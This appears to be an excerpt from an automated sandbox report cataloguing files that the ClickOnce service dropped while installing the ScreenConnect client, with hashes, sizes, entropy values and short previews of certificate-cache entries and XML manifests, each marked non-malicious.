SHA-256:	552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
SHA-512:	BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
Malicious:	false
Preview:	0...0..x..........W..!2.9...wu\0....H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0....H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...sn..\|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..\|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0....H..............a.}.l.........dh.V.w.p...J...x\.._...)V.6I]Dc...f.#.=y.mk.T..<.C@..P.R..;...ik.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	338
Entropy (8bit):	3.4620383296566426
Encrypted:	false
SSDEEP:	6:kKxe+E48TsJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:M4cHkPlE99SCQl2DUevat
MD5:	FE800BB582F621C12E52927E3475BDD2
SHA1:	AA3AD3023D8635244EA44B3AD15E5D795CBC89D0
SHA-256:	549714EFB01A37497DC32EA7D68C110290EEF0EEAA81D4C9236A7615B16B6ADC
SHA-512:	7422B0E640CB414CEE8ACA0BCB07C0DDB660396208B13619C80FAEA23ED32D0F11357146AA493E3C1F811E901971318945454B075C15FC8ECC99A9916A599389
Malicious:	false
Preview:	p...... ...........A^...(.................................................X..... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	308
Entropy (8bit):	3.222088880688642
Encrypted:	false
SSDEEP:	6:kKAplnzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:wStWOxSW0P3PeXJUZY
MD5:	2CA47AC0363A85D0B95B74A5435669CC
SHA1:	BE489E9FA86A42B7F006ED4A875B53DE90FAA18B
SHA-256:	269A3CC90F8FF337729EE4494F025A9BF4856AC350C4CC5EFF8BD413689A36A9
SHA-512:	A7930BB417776865D7322989F555C733034F7CD6190323D319A3A2E46E613A50D89225CDA4DB5557FF394ADD40EA74AD1B3B19303B5DD9B6447A7408D31CA9D8
Malicious:	false
Preview:	p...... ........y......(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	412
Entropy (8bit):	3.99804604265456
Encrypted:	false
SSDEEP:	12:2cZiXuUmxMiv8sFBSfamB3rbFURMOlAkr:r4Xhmxxv7Sf13rbQJr
MD5:	459F126B5A4C0E4E681C30C385C34187
SHA1:	3F14C7507A408979961EEF3B76FFE2FC8A6A9C63
SHA-256:	0C50A7D6CF8880F601CC4970C806BB1850D853455E8AEB95E2C3CA0219C67750
SHA-512:	B1B226636330F4CD9CDD7B8041DE32B9C63CB23DB9F3AEBA701D376A4D7CD71BA1BEE3923BED6735D3CD79224B6AAE6278C64E97A21D074DE68D9E240889694A
Malicious:	false
Preview:	p...... ....(.....X....(..................xh....].......................]...... ............... ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	254
Entropy (8bit):	3.052898866971229
Encrypted:	false
SSDEEP:	6:kKBkzLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:KLYS4tWOxSW0PAMsZp
MD5:	A66A8273EDCFC8A61F8464A96E4BB928
SHA1:	F7C75E734CB5E07CDF646C385C03A322CAFCEC89
SHA-256:	82BF18893139899C848E0C440215984FDF9D61D77098FDDCEA7ABD400BF5363C
SHA-512:	A2C37D94338EFC4AD744533E6E35D889DBBD113D75723DC0C794ABF4DA416A6C562A381BEFA76283A23CB594EE0654B20807644E581E8467B76372DBD5F61093
Malicious:	false
Preview:	p...... ....l...m.......(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	25496
Entropy (8bit):	5.59429253432769
Encrypted:	false
SSDEEP:	768:Hsh526tX9DkX9R/QPI+0VQKWpJhG0VpMFF2DTyq85EM:6NDkNzRQ1I7
MD5:	FDD9717CC53BF81D791323FDDFCFB695
SHA1:	CA96E9398F55190A09C71AB30DD09295DF2F04F1
SHA-256:	28B0C5C7578E8DF1318D457ACB3B7AE2F687FAC585E7782D1135AAA35F14E2FB
SHA-512:	AFE7D6C848DBE4F7CEEF7591A53D49FAF82FCCCDBC8CB1E1B9C3048A6FE39CEA619F1073AA6475428E6BFB8634F809D9386FADDEED7211654168EE4427822CFE
Malicious:	false
Preview:	PcmH..............8.f.......!...T...........................e...?....<.g..J.\|r,..`P....}'.d.........8........R....................U.K...W.....U..c...................'-........s".I...R.....$...........3..L.G.......S..{.........6.......'~.x.h.....[...........5...M...8..........~9......-.a:...j.......;...K*...!.<......6..A....y.].m..C....=4.....E....&..{.!.G....qz...#aI...@.R....K....u..IV..N......D..O.....E..X.R...O.&r..VzU......3LD.SY...[s.T..<\...........`.......=...P...S...V...Z...].......,.......L.......T.......\.......`.......\|...........................................@.......0...........<.......T.......h.......\|...0.......................................0...........<.......T.......h.......\|...0.......................................0...........8.......L.......`...0...l.......................................................................,.......8.......L.......`.......l...........................................................................................@...

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
Category:	dropped
Size (bytes):	17866
Entropy (8bit):	5.954687824833028
Encrypted:	false
SSDEEP:	384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
MD5:	1DC9DD74A43D10C5F1EAE50D76856F36
SHA1:	E4080B055DD3A290DB546B90BCF6C5593FF34F6D
SHA-256:	291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
SHA-512:	91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	3452
Entropy (8bit):	4.220724414315353
Encrypted:	false
SSDEEP:	48:qMIEfBeF7lWuWWuLg0e6S+9owQX7g27mL438cOhouGMJK36hIYX:nJ3uWWmeV+WwQXlmL4McwouGMJKqhIYX
MD5:	724EA30BDC89887BB25C8498CBCB3FD5
SHA1:	B5E3B145AFAEE242040F457D27769C31654F5560
SHA-256:	94BB86F7C98EEDAD2FF78B0E5A1A67065DDA45132EBD707D2F617C48C8C0F883
SHA-512:	CFA2F3323005335049C649090090527EE25F8BF17DA12165D7F0DDCA5EEF0E0D26C45828AB45BF7C01F81C070659B7D23F492FCE860A007129556A4A662A227E
Malicious:	false
Preview:	PcmH............{..#...(.......T..........................."........<.g..J.\|r,..`P..............E..X......U..c...................'-........s".I...R.....$...........3..L.G.....'~.x.h.................z..w.....[~31.X....s)..;$D......B(.........f..VC.........;..........................0...@...0...p...0.......0...................................0.......4.......D.......T.......\...4...h...........P...\...........@...................................,...(...4.......\.......d.......x...(.......................(.......................(...........$...4...,.......`...................................................................................................................................................................................................nameScreenConnect.Core%%processorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.10.8991....................................................MdHd............D...........MdSp(...$...(...(...#............... urn:schemas

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.1303806593325705
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
MD5:	2343364BAC7A96205EB525ADDC4BBFD1
SHA1:	9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
SHA-256:	E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
SHA-512:	AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	5260
Entropy (8bit):	3.9578848509637
Encrypted:	false
SSDEEP:	96:5Nq6R84TeV+Ww7mk6OIEofXT81eiv3NwnjIbm:hR84UJC6sk4kjd
MD5:	9DCCE096D2FEEAD7C555E6F53BF27EA3
SHA1:	0249604F088BF12D076F476443FFEEAF5E18B373
SHA-256:	82126CFEBFE11DBAD3957D997CB712A25634C02A3644BDB819BAE1A9E1BF50D2
SHA-512:	123BC4BA1A0DA045FB95555743FCB544A0E7A41ECCFD007A4F0B0D530264D96E88B949FEBFC94E4236F5A87DA13E73AF89642A543CE4377162C18B480345A277
Malicious:	false
Preview:	PcmH........_.m.oKk.4...t.......T...............P...........3........<.g..J.\|r,..`P............O.&r..Vz.....U..c...................'-........s".I...R.....$...........3..L.G.....[.......................z..w.....[~31.X....C.........y..&..d......B(.........^.ie...u"...F.....Ey%.....E..X.(...s".I...R)....+.`...m,......;../............... ...#...&...*...-...0...0.......0...D...0...t...0.......0.......0.......0...4...0...d...................................................................4...........4...P...........l...@.......................................(........... .......(...(...<.......d.......l.......\|...(.......................(.......................(...........8.......@.......T...(...d...................(.......................(...............d...........p.......................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1982
Entropy (8bit):	5.057585371364542
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
MD5:	50FC8E2B16CC5920B0536C1F5DD4AEAE
SHA1:	6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
SHA-256:	95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
SHA-512:	BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	6588
Entropy (8bit):	3.8867142470257408
Encrypted:	false
SSDEEP:	96:QMmxTeV+WwwU8WpbAihOJgrFKwPF/eKMFksJqi/D5:UxUJwpbNDZHtw75
MD5:	CD35FD447A4C66FAC5260DE1F09BB8DB
SHA1:	8FB4414ED6C4EDE85E85FD7EC052B86C0FE5CADF
SHA-256:	B935ED060E04C5772C0ED288073C6BBB64F1B87ECE798584E5B80D3116629FEB
SHA-512:	1717C0322E7251B00D3CEA77E42F3F439C8129494CA3D7BAE084E8BC9F4255C8AC8326BF957278722C934EB6CA286F04F55F4892B4D06A33558B9A223122B4D1
Malicious:	false
Preview:	PcmH.........`.kN..@...........T...............t...........?........<.g..J.\|r,..`P.............U.K...W.....U..c...................'-........s".I...R.....$...........3..L.G.........}'.d................z..w.....[~31.X....y..&..d......B(.........C....."...^.ie...u%...[s.T..<(...s".I...R)...F.....Ey,.....E..X./...f..VC..2...O.&r..Vz5......;..8.....V....X;........... ...#...&...*...-...0...3...6...9...<...0.......0.......0.......0...4...0...d...0.......0.......0.......0...$...0...T...0.......................................................................4...$.......X...P...X...........@........................... .......0...(...8.......`.......h.......x...(.......................(.......................(...........8.......@.......T...(...d...................(.......................(.......................(...$.......L.......T...(...l...................(.......................(...................................................................................................

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2573
Entropy (8bit):	5.026361555169168
Encrypted:	false
SSDEEP:	48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
MD5:	3133DE245D1C278C1C423A5E92AF63B6
SHA1:	D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
SHA-256:	61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
SHA-512:	B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	3032
Entropy (8bit):	4.875314808226146
Encrypted:	false
SSDEEP:	48:6MQScXgFe6S+9oww7g47BI7EuqSGzhvVDvxLi0nwbb:6XScCeV+Wwwni7npGjD5L3nEb
MD5:	14AF9BF79B2E8DD760C3906B9D28C394
SHA1:	914FEBBCDF9D65A7D71E8FCB2A57FD08AA75D84F
SHA-256:	50245A755F2661049974B942F03625C02ED4949F4CE69470ED31D69F5BD4AD78
SHA-512:	A0D4D256717A7BEF67902B2025854E05DF94A88EC69038880E35CC7C4880403B512523F925138C1252C0AD808C03F752CF99DBFB96B19F23EE0E366849B5D143
Malicious:	false
Preview:	PcmH............8..!............T....................................<.g..J.\|r,..`P............[s.T..<.....U..c...................'-........s".I...R.....$...........3..L.G.......S..{..................z..w.....[~31.X......E..X.....s".I...R.......;......................0.......0...@...0...p...................................................................4...........<...P...........P...@...h...................................(...............................(...,.......T.......\...(...d...........(...............................................................................................................................................................nameScreenConnect.ClientprocessorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.10.8991....................................................MdHd............<...........MdSp ...$....... ...".............Bi urn:schemas-microsoft-com:asm.v1.assembly.xmlns.1.0.manifestVersion urn:schemas-microsoft-com:asm.v2.asmv2)

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1041
Entropy (8bit):	5.147328807370198
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
MD5:	2EA1AC1E39B8029AA1D1CEBB1079C706
SHA1:	5788C00093D358F8B3D8A98B0BEF5D0703031E3F
SHA-256:	8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
SHA-512:	6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	14612
Entropy (8bit):	5.713951740054136
Encrypted:	false
SSDEEP:	192:8Wh4+yn9q5s6VHoY8s8oXN8s8oTN2x2QPIlFDLhEDh7BqWoDOs:8WG9qS6VTX9dX9R/QPIBM7YDb
MD5:	1D12726F85ABE532FFAA21454B2A7635
SHA1:	62FA92D663AF21AF317DF09492570D11ADAE8730
SHA-256:	98646CE95E6A2E9B0185C73BB1C1409BAC212CEC695ED698BB8C8EBA524E0699
SHA-512:	798F562B87E5CEE20B2806F86E8ADDB2FA668E486EC29D79AFF5237F08860927C31DCABFC757629C757F4DF869FA949C63A60DA5D63A4C0C74542FC378FDDE70
Malicious:	false
Preview:	PcmH........@..`..%`$...@.......T...............8...........#........<.g..J.\|r,..`PF...}&............Z.....)....E......x...\......=+.p.......I\t.\..>................j.K...6.....U..c...................'-...........-.a.....$...........3..L.G..........8........R...........}'.d....j...........K*...!.................`...........................0...................................................(.......@.......P.......T...'...X...................................................4................3......P....7......@8......H8......P8......p8......t8..L...\|8.......8.......8.......8.......8.......8..ScreenConnect.Client.manifest%%%....]...Tk....Y?.Om...a............-........................E......................................4.0.30319%%%Client%%4.0%ScreenConnect Software%%ScreenConnect Client....................................P.......nameScreenConnect.WindowsClient.application%processorArchitecture%%%msilpublicKeyToken%%25b0fbb6ef7eb094version%24.2.10.8991........................

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
Category:	dropped
Size (bytes):	118084
Entropy (8bit):	5.584890162201507
Encrypted:	false
SSDEEP:	3072:0aNIcT51/FXvMVNWfCXq9ymxm2o9HuzhJOvP:0FcfiVITmt8vOvP
MD5:	9F442D8293F1917B8CD6F007F3FEEBE6
SHA1:	3065E347263BFEA93CC987DF08E9630EBCF3E870
SHA-256:	CB63564F6233140A150E013346957F108A71E8B224A82FD68B6FD6418324D438
SHA-512:	58D79221BF7771535A878B11A4454BBAA75D6EFA087B4CB0DDA486E9E58A66F89D518A104AE8249471561FAC20BEBA39A5D011F4172DCFD72BAD931A26E534F0
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	4428
Entropy (8bit):	4.149714126477493
Encrypted:	false
SSDEEP:	48:2OQKXCD5v+dgLe6S+9ow87gFW75uvW5O30Y42khUOfDF0e9JQkoDprOaJCf:/vXoeV+Ww8U45uuOc2khUOBj9mkoNOrf
MD5:	E4316B13AB38419112C933F43E7A5BA0
SHA1:	18DE862F18D1D2CAB2F0424F986382968789454A
SHA-256:	331AE23A764C116DCB325DC44EF8F979C197FB32054902D6DD60B0F321B0AF8C
SHA-512:	689B9EF8ADEB7465156BC29BB7B7E0533CB1CD902B2975EE7862E41A4EA1B680CC8033DBC04867A4F9C7AB968E346F682E845ACBF2C32FF2A53BBA0BAC51AF1A
Malicious:	false
